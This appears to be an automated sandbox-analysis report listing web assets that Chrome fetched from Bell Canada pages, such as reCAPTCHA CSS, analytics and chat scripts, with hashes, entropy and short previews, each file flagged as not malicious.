                                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/styles__ltr.css
                                                                                                                                                                                                                                                                                                                                      Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):74807
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.7763020038423205
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:FohckcEsIcoxcQKei4zByROlUohckcEsIcoxcQKei4zBwRcBH8R:2ByROxBwRcBcR
                                                                                                                                                                                                                                                                                                                                      MD5:43E9EB91934F407D6B85DB2C66E4766F
                                                                                                                                                                                                                                                                                                                                      SHA1:D18D4F12DC94BDA0B1C027515D6DE0E3CFD798A7
                                                                                                                                                                                                                                                                                                                                      SHA-256:E8FCA52DF9B46F069F7F6434A5442C982EE340F14111575BCF1BD89E2C58F2DA
                                                                                                                                                                                                                                                                                                                                      SHA-512:E5CAC234C65624C4CA8DC7E7423FB41474BC939E198443FFA6F55EA8D8021643543E21E5A165B122F14BAA9FF12ACE6516D0A77487557370D3EDDAE8B713C3A2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(73,28-29): run-time error JS1195: Expected expression: >..(78,36-37): run-time error JS1195: Expected expression: >..(78,118-119): run-time error JS1195: Expected expression: )..(79,38-39): run-time error JS1195: Expected expression: >..(81,14-15): run-time error JS1195: Expected expression: )..(84,9-10): run-time error JS1002: Syntax error: }..(87,10-13): run-time error JS1195: Expected expression: var..(87,42-43): run-time error JS1004: Expected ';': )..(108,5-6): run-time error JS1002: Syntax error: }..(110,41-42): run-time error JS1004: Expected ';': {..(122,1-2): run-time error JS1002: Syntax error: }..(127,28-29): run-time error JS1004: Expected ';': {..(418,56-57): run-time error JS1195: Expected expression: >..(932,28-29): run-time error JS1195: Expected expression: >..(937,36-37): run-time error JS1195: Expected expression: >..(937,118-119): run-time error JS1195: Expected expression: )..(938,38-39): run-time error JS119
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):58876
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.405683338218142
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                                                                                                                                                                      MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                                                                                                                                                                      SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                                                                                                                                                                      SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                                                                                                                                                                      SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://static.ads-twitter.com/uwt.js
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (27262)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):30953
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.404483058426303
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:eM3+xW4/2+/6/oCeF8wPnzxN2DiBGhLylG4DXYGmB:eMPcU/o182EhLSUGmB
                                                                                                                                                                                                                                                                                                                                      MD5:BD44B299FB6FD5B9A2A3F4F3C080F85C
                                                                                                                                                                                                                                                                                                                                      SHA1:4AB2E75A0C0AA0C6ECD12FED26C502C81506154B
                                                                                                                                                                                                                                                                                                                                      SHA-256:E34FC3965EDB73D7835C318A20B403FCDD6F86269B95B2F9B58A07A3A974F1D8
                                                                                                                                                                                                                                                                                                                                      SHA-512:388D43D87BB57F0143D04660AEB392E0FB419FF6FC9672DCEC6D8CE685366BD5027FC615FB1C151A36D18BB8182CA7C44925FEA8ADD0A197FC60361AADC0762D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/tealeaf/tltWorker.js
                                                                                                                                                                                                                                                                                                                                      Preview:/*! pako deflate 1.0.11 with Dojo/ReactJS fix. The fix consists of the forcing of the assignment of the returned object from the call to 't()' to 'window.pako' */.!function(t){self.pako=t()}(function(){return function i(s,h,l){function o(e,t){if(!h[e]){if(!s[e]){var a="function"==typeof require&&require;if(!t&&a)return a(e,!0);if(_)return _(e,!0);var n=new Error("Cannot find module '"+e+"'");throw n.code="MODULE_NOT_FOUND",n}var r=h[e]={exports:{}};s[e][0].call(r.exports,function(t){return o(s[e][1][t]||t)},r,r.exports,i,s,h,l)}return h[e].exports}for(var _="function"==typeof require&&require,t=0;t<l.length;t++)o(l[t]);return o}({1:[function(t,e,a){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Int32Array;a.assign=function(t){for(var e,a,n=Array.prototype.slice.call(arguments,1);n.length;){var r=n.shift();if(r){if("object"!=typeof r)throw new TypeError(r+"must be non-object");for(var i in r)e=r,a=i,Object.prototype.hasOwnProperty
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (15669), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):15669
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.263742140717986
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:06T0S1t5pEIntlomlmixUxwoaCnh21A1xKrpEIntlomlSopTg:rrPa6oaCnhIA1xAMIg
                                                                                                                                                                                                                                                                                                                                      MD5:CB5B7E9FD96CB0442D68F85B47E87902
                                                                                                                                                                                                                                                                                                                                      SHA1:D9E94789F8C9B539CEF9011D3A82398DF60E833A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D9B2E5281ABB267C48866876D6037E8EDF343C52D185F147DBC8FA393C73C388
                                                                                                                                                                                                                                                                                                                                      SHA-512:329E8F71C12E3FF05358F2451CDE7523528CF53B98BCD2F5A4987F7B6C9E1038481359364E59E757CD8AC0E34D3AEA449C419671BC89B87ABA7058E2937F3147
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Web/MYB/custom/js/eChat/echat-common.min.js?ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:function setechatCookie(e, t) { "https:" == window.location.protocol ? document.cookie = e + "=" + t + ";domain=.bell.ca;path=/;secure=true;samesite=Lax" : document.cookie = e + "=" + t + "; path=/; domain=.bell.ca;" } function getechatCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var o = e.split("=")[0], i = e.substring(e.split("=")[0].length + 1); t[o.trim()] = i }), t[e] } function dragElement(e, t) { if (null !== e) { var o = 0, i = 0, c = 0, s = 0; if (-1 != navigator.userAgent.indexOf("MSIE") || !0 == !!document.documentMode) var a = document.getElementById("mydiv").getBoundingClientRect().left; else var a = $(window).width() - e.offsetWidth; var l = $(window).height() - e.offsetHeight; function p(e) { (e = e || window.event).preventDefault(), c = e.clientX, s = e.clientY, document.onmouseup = r, document.onmousemove = n } function n(p) { if ((p = p || window.event).preventDefault(), o = c - p.clientX, i = s - p.clientY, c = p.clientX, s = p.cli
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (423)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):570
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.322641239846057
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBSx5YpIct/BeTrAApBSx5YpBLWidGTEX+DRWx3SCurKmwOgp3irUk+L:zlixsIct/BMlixsYidG4XGRWxlurKr3X
                                                                                                                                                                                                                                                                                                                                      MD5:2709C8C13D27186FEA620DF8EF509DDD
                                                                                                                                                                                                                                                                                                                                      SHA1:1F7527969B4252D33912FB7E37A0903EE6414E24
                                                                                                                                                                                                                                                                                                                                      SHA-256:BCD05B317F116F080E8AD56264E3D0F841E28E1E5574D3851573321A1AB99CC1
                                                                                                                                                                                                                                                                                                                                      SHA-512:6103AC3B986875C9FE64E5E75FD757398F06F0362E92C2F39AB0F8382B8AC2CD44E6E1ACD57C73F49578365CDEDF7E01EC00C3FEA2BB769559B1540AEF3E0D5B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0d8b1f5e842b42a98045e57cb835d073-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0d8b1f5e842b42a98045e57cb835d073-source.min.js', "_linkedin_data_partner_id=\"37981\",function(){var t=document.getElementsByTagName(\"script\")[0],e=document.createElement(\"script\");e.type=\"text/javascript\",e.async=!0,e.src=\"https://snap.licdn.com/li.lms-analytics/insight.min.js\",t.parentNode.insertBefore(e,t)}();");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (15608), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):15608
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1626936985974226
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:idGlyeNWeLGWkY7kYvHIV7rtV7LML9kMJQ2n/eqb5X:uLJEahtJsJDdVX
                                                                                                                                                                                                                                                                                                                                      MD5:A2661EB200472ED6299C7937A94360E7
                                                                                                                                                                                                                                                                                                                                      SHA1:D95CF4707E5D5647ADE4FDA2F0ACCFBB46096FC9
                                                                                                                                                                                                                                                                                                                                      SHA-256:1303BA60D1F710CBE1DFC4B1FCF1DAAF9D65805B167CB296A499BE7B101A4993
                                                                                                                                                                                                                                                                                                                                      SHA-512:FD5F4FAE149B7C38060D7DA606D27174D6DAC43E2928DD10630A38844F8DD2657BEE781C0FCEEBEA40B0196010D98896A1C923F6453EC125DAFC87E8DF189309
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var omnitureInterval, counter = !1, proActiveCounter = !1, newSessionAgent = !1, newSessionMsg = !1, newSessionMinimize = !1, newSessionStartOver = !1, newSessionChatTranscript = !1, newSessionClose = !1, newSessionsocketConnected = !1, chatdetails = ""; function getOmnitureCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var n = e.split("=")[0], i = e.substring(e.split("=")[0].length + 1); t[n.trim()] = i }), t[e] } var socketConnected = "", isChatOpen = "", isChatAgentConnected = "", chatId = "", engagementId = "", chatEngineType = "", clickedStartOver = !1, isChatActive = "", chatEntry = "", pageCategory = "", isProactive = "", proactiveType = "", omnitureCookieNames = ["__csomni", "__ceidomni", "__cacomni", "__cminomni", "__cromni", "__ctromni", "__cepomni", "__cpcpomni", "__cabomni", "__cpaomni"]; setInterval(function () { var e = void 0 !== getOmnitureCookie("__eccomp"), t = e ? readCookieContentById("eccompslex", "__cwss") : getOmnitureCookie("__c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (57057), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):57172
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.881500759559145
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:F/t91PRv1/Zv7tBtjZxEcj3Qe9gpE2gWs101wJyb8V+XbCj8/:FlzjZxEcj3Q86/
                                                                                                                                                                                                                                                                                                                                      MD5:0AB1D89C68AB1C7909D27D309697B941
                                                                                                                                                                                                                                                                                                                                      SHA1:10B91D659723A8539FF0E8854E3C73182017DF62
                                                                                                                                                                                                                                                                                                                                      SHA-256:3C10D3FDE06A4701F8646A8BEA7C78DFDC26C4F491D06ED5DECFE9A0F5033AEA
                                                                                                                                                                                                                                                                                                                                      SHA-512:5AEFB5B0A352C4625D340DAAE66A97F1E317A0BB5E7E9381F89783C673B4452CEF23DCF37855748A4975C0760C304D65631D096E7EE7E56A40848EA92E6E04E5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/BRF3/core/css/connector.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:header{background-color:#fff}.g-connector,.g-mobile-bar-btns-wrap{background-color:#00549a}.g-connector button:after,.g-hide{display:none!important}.g-header .g-skip-to-main-link{display:inline-block;padding:9px 12px;position:absolute;top:-50px;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);text-decoration:none;border-bottom-right-radius:8px;transition:top .3s ease-out;z-index:3000;color:#fff;text-transform:uppercase;font-size:11px;background:#2d2e33}.g-header .g-skip-to-main-link:focus-visible{top:0;outline:#fff solid 2px!important;outline-offset:4px!important;border-radius:2px!important}.g-header #connector.g-connector :focus,.g-header :focus{outline:0!important}.g-connector .sr-only,.g-federal-bar .sr-only{position:absolute;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.g-mobile-nav-active .g-header{position:fixed;width:100%;top:0}.g-header{position:fixed;width:100%;top:0;z-index:17100}.g-connector-desktop-nav-backdrop
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.446854365656768
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:UY7yhyXPZssUcPK:UY+EBssU+K
                                                                                                                                                                                                                                                                                                                                      MD5:0DC94F396EB4AE9BE6FFBB0712AC46D5
                                                                                                                                                                                                                                                                                                                                      SHA1:E37C6D04472FF2919039D5531E43C7109A3089B1
                                                                                                                                                                                                                                                                                                                                      SHA-256:F7312AE609D2FB8910D194214B0C2F006ED15BE27D9E45BE3EB3FDDEF5759D01
                                                                                                                                                                                                                                                                                                                                      SHA-512:F23B675BCBB9B8E2D946F9CBEBA1D03ECD82B69EDD8F5A259BD4CACB4C18346B94DF08F802DCA7D25B4B4DC42655ACAED5769354F3859E2FF652AAB275675335
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Subscription expired - 2023-10-25T15:30:11 */
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):30878
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.395737396054499
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:zpI3kjilKDonpjxqty5qXWZT8HjiyBMAtmN4C4SYCGUCzZiBFS/+0O/txrnSgnk5:z2tlrp6y5+BHm4C4N1hmv0O/zrSe1M
                                                                                                                                                                                                                                                                                                                                      MD5:E733D2CAC0566337507A0508043E9406
                                                                                                                                                                                                                                                                                                                                      SHA1:5F3952DC9DCE1342BF44CF510A85B43356E2E5BB
                                                                                                                                                                                                                                                                                                                                      SHA-256:635B2814DBECB78302D05C529BF175EF815EF51E7C344769247896504843B731
                                                                                                                                                                                                                                                                                                                                      SHA-512:053E72F1F32AA06D56E727525CF33358A97C0FE2EB6EC6886D44BCFFCE728CA18E89453F1173946F70EAE1758C9C76CB47BB2EF4734E450FD3BD611F72944632
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var t=da(this);function u(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var g=a[d];if(!(g in c))break a;c=c[g]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}.function c(k,e){this.g=k;r(this,"description",{configurable:!0,writable:!0,value:e
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.897114354329914
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREayqXXl6E81CSHI:UrXiuqX1IRo
                                                                                                                                                                                                                                                                                                                                      MD5:F2525211FE87A48B05764869C806D3D5
                                                                                                                                                                                                                                                                                                                                      SHA1:95C2F2CEB86FCA0F0C080064B1DAE7BE44E8DE81
                                                                                                                                                                                                                                                                                                                                      SHA-256:2F95B658A1267E54F82CDCAAF627944FA5B022CF6F18151C3F5CC7106C6F66B7
                                                                                                                                                                                                                                                                                                                                      SHA-512:83179BC719860EFCD912CEDA383BA74BADF960CE9A8D67EC7D39725A5775076D949F5A63DE90B36DB2E4728D35454A0E280EAA020F7BF6C84E466798AFA4BDC8
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__11
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__11 === 'function' && branch_callback__11("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 81x77, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):9744
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.804592820922817
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:1AhgxOQjz9qXAfIop80qsWr2UWGAHddaL3sIKS5sdB1w+Zvrvp:1AhgcQfiDJh2ZG0ddaDsID23trx
                                                                                                                                                                                                                                                                                                                                      MD5:1C75BEB5DF106A3B0AD48F2CA2A93535
                                                                                                                                                                                                                                                                                                                                      SHA1:7A3D5A78A58927B0EF80C02CAEE46D50C008E463
                                                                                                                                                                                                                                                                                                                                      SHA-256:7B1416DB2386C035920FBAAC1EDA0AEA0067A271808920B91082F8DC8D435871
                                                                                                                                                                                                                                                                                                                                      SHA-512:5B4443E7B9F162403F7107450DF7DA60A1E886693A41BF40C9CCD3D7A2757A305CFE30F19DB1A80EC3F91D307DB4B592C79EE03EFC9B76CE43B48A4CD2C4C0AB
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
